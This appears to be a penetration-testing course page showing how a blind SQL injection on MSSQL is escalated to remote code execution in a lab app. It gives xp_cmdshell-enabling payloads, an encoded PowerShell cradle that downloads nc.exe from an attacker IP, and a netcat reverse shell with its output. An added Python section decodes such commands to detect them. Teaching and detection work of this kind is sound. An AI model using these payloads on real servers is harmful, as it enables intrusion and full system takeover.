Blind SQL Injection  

Remote Code Execution

Scenario

If we have an SQL injection as the sa user, or if our user has the necessary permissions, we can get MSSQL to run arbitrary commands for us. In this section, we'll use the Aunt Maria's Donuts example once again to achieve a reverse shell.

Verifying Permissions

Before anything else, we want to verify whether we can use xp_cmdshell. We can check whether our user holds the sysadmin role (which sa always does) with the following query:

SELECT IS_SRVROLEMEMBER('sysadmin');

The query asks the server if our user has the sysadmin role or not, returning a 1 if yes, and a 0 otherwise. In the example of Aunt Maria's Donuts, we can use the following payload:

maria' AND IS_SRVROLEMEMBER('sysadmin')=1;--

This should result in a taken status, indicating we have the sysadmin role.

Enabling xp_cmdshell

The procedure which allows us to execute commands is xp_cmdshell. By default it executes commands as nt service\mssqlserver unless a proxy account is set up.

Since xp_cmdshell is a target for malicious actors, it is disabled by default in MSSQL. Luckily it isn't hard to enable (if we are running as sa). First, we need to enable advanced options. The commands to do this are:

EXEC sp_configure 'Show Advanced Options', '1';
RECONFIGURE;

In the case of Aunt Maria's Donuts, the payload will look like this:

';exec sp_configure 'show advanced options','1';reconfigure;--

URL-encode the payload and inject it; if it worked correctly, the server should return a regular response.

Next, we will enable xp_cmdshell (it is an advanced option, so make sure to run this previous query first). The commands are:

EXEC sp_configure 'xp_cmdshell', '1';
RECONFIGURE;

The payload (before URL-Encoding) is:

';exec sp_configure 'xp_cmdshell','1';reconfigure;--

And once again, a successful injection should return a regular response.

At this point, xp_cmdshell should be enabled, but just to make sure we can ping ourselves a couple of times. The command to do this looks like this:

EXEC xp_cmdshell 'ping /n 4 192.168.43.164';

And as a payload like this:

';exec xp_cmdshell 'ping /n 4 192.168.43.164';--

Make sure to start tcpdump on the correct interface (which would be tun0 for Pwnbox) before running the payload; you should see 4 pairs of ICMP request/reply packets:

[!bash!]$ sudo tcpdump -i eth0
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
<SNIP>
07:41:13.167468 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 6, length 40
07:41:13.167500 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 6, length 40
07:41:14.218855 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 7, length 40
07:41:14.218928 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 7, length 40
07:41:15.190453 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 8, length 40
07:41:15.190515 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 8, length 40
07:41:16.209580 IP 192.168.43.156 > 192.168.43.164: ICMP echo request, id 1, seq 9, length 40
07:41:16.209615 IP 192.168.43.164 > 192.168.43.156: ICMP echo reply, id 1, seq 9, length 40
<SNIP>
^C
29 packets captured
29 packets received by filter
0 packets dropped by kernel

The website should once again give a regular response.

Reverse Shell

At this point, we have successfully turned our SQLi into RCE. Let's finish off with a proper reverse shell. There are many ways to do this; in this case, we chose to use a Windows netcat binary to run cmd.exe on a connection.

The (powershell) command we want the server to run looks like this. First, we download nc.exe from our attacker machine, and then we connect to port 9999 on our attacker machine and run cmd.exe.

(new-object net.webclient).downloadfile("http://192.168.43.164/nc.exe", "c:\windows\tasks\nc.exe");
c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;

To avoid the hassle of quotation marks, encoding PowerShell payloads is preferred. One useful tool for this is Raikia's Hub; however, it is known to go offline from time to time. As penetration testers, it is important to know how to perform such tasks without relying on any external tools. To encode the payload, we first convert it to UTF-16LE (16-bit Unicode Transformation Format, Little-Endian) and then Base64-encode it. We can use the following Python3 one-liner to encode the payload, replacing PAYLOAD with the actual PowerShell one:

python3 -c 'import base64; print(base64.b64encode((r"""PAYLOAD""").encode("utf-16-le")).decode())'
[!bash!]$ python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://192.168.43.164/nc.exe", "c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 -e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())'

KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADEANgA0AC8AbgBjAC4AZQB4AGUAIgAsACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIgApADsAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIAAtAG4AdgAgADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADYANAAgADkAOQA5ADkAIAAtAGUAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdABlAG0AMwAyAFwAYwBtAGQALgBlAHgAZQA7AA==

With the encoded payload, we need to pass it to powershell, setting the Execution Policy to bypass along with the -enc (encoded) flag. The command we will want the server to execute becomes:

exec xp_cmdshell 'powershell -exec bypass -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQAMwAuADEANgA0AC8AbgBjAC4AZQB4AGUAIgAsACAAIgBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIgApADsAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAbgBjAC4AZQB4AGUAIAAtAG4AdgAgADEAOQAyAC4AMQA2ADgALgA0ADMALgAxADYANAAgADkAOQA5ADkAIAAtAGUAIABjADoAXAB3AGkAbgBkAG8AdwBzAFwAcwB5AHMAdABlAG0AMwAyAFwAYwBtAGQALgBlAHgAZQA7AA=='
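Seen from the defending side, the same encoding step is what a responder has to undo. The following Python is an added example (not part of this page) that decodes a `-enc` argument back to the PowerShell it carries and triages process-creation events whose parent is sqlservr.exe, which is the shape that xp_cmdshell use (the ping check and the encoded reverse-shell command above) leaves in endpoint telemetry. The Sysmon-like field names, the install path and the sample events are constructed for the example.

```python
import base64
import re

# What the page's one-liner does: UTF-16LE, then Base64 (the format PowerShell's -enc expects).
def encode_ps(command: str) -> str:
    return base64.b64encode(command.encode("utf-16-le")).decode()

# The reverse: pull the -enc/-EncodedCommand argument out of a command line and decode it.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str):
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command (e.g. "-e bypass" captured "bypass")

INDICATORS = {"download_cradle": re.compile(r"downloadfile|downloadstring|invoke-webrequest", re.I),
              "netcat_shell": re.compile(r"nc(?:64)?\.exe.*\s-e\s", re.I)}

def triage_event(ev: dict) -> dict:
    # Any cmd.exe child of sqlservr.exe means xp_cmdshell (or similar) ran; an encoded command
    # or a known pattern inside it raises the severity.
    from_sql = ev["ParentImage"].lower().endswith("sqlservr.exe")
    decoded = decode_encoded_command(ev["CommandLine"])
    text = decoded if decoded is not None else ev["CommandLine"]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    severity = "none" if not from_sql else ("high" if decoded or hits else "medium")
    return {"from_sqlservr": from_sql, "decoded": decoded, "indicators": hits,
            "alert": from_sql, "severity": severity}

# Constructed sample events (Sysmon-like field names, assumed): the first two mirror this page's payloads.
PS_COMMAND = ('(new-object net.webclient).downloadfile("http://192.168.43.164/nc.exe", '
              r'"c:\windows\tasks\nc.exe"); c:\windows\tasks\nc.exe -nv 192.168.43.164 9999 '
              r'-e c:\windows\system32\cmd.exe;')
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SAMPLE_EVENTS = [
    {"ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -exec bypass -enc " + encode_ps(PS_COMMAND)},
    {"ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c ping /n 4 192.168.43.164"},
    {"ParentImage": r"C:\Windows\System32\services.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c schtasks /query"},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(triage_event(event))
```

The unencoded ping from the check above still alerts at medium severity, since a shell spawned by sqlservr.exe is itself the thing a hardened server should never do.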

Before we run the command, we need to download and host nc.exe on our machine for the server to download. You can download a compiled version from here. Put it in any directory and then start a temporary HTTP server on port 80 with Python like this:

[!bash!]$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Once the HTTP server is listening, start a netcat listener with nc -nvlp 9999 and inject the payload! We should get a reverse (cmd) shell.

[!bash!]$ nc -nvlp 9999
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.43.156.
Ncat: Connection from 192.168.43.156:58085.
Microsoft Windows [Version 10.0.19043.1826]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Note: If you prefer using PowerShell, you can of course have `nc.exe` run it instead of `cmd.exe` by using a command like `nc.exe -nv 192.168.43.164 9999 -e C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe`
